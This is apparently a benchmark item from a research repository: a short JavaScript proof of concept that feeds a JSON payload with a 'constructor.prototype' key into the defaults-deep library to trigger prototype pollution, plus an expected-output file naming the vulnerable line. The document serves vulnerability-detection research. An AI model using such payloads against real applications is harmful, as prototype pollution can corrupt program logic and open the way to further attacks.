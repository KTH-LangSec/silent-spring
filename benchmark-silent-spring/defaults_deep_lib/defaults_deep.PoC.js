//https://hackerone.com/reports/380878
const defaultsDeep = require('defaults-deep');

let obj = {}

let payload = JSON.parse('{"constructor": {"prototype": {"polluted": "yes"}}}');
defaultsDeep({}, payload);
