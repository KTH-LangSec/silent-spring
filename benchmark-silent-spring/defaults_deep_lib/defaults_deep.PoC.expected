node_modules/defaults-deep/index.js:26:9:26:14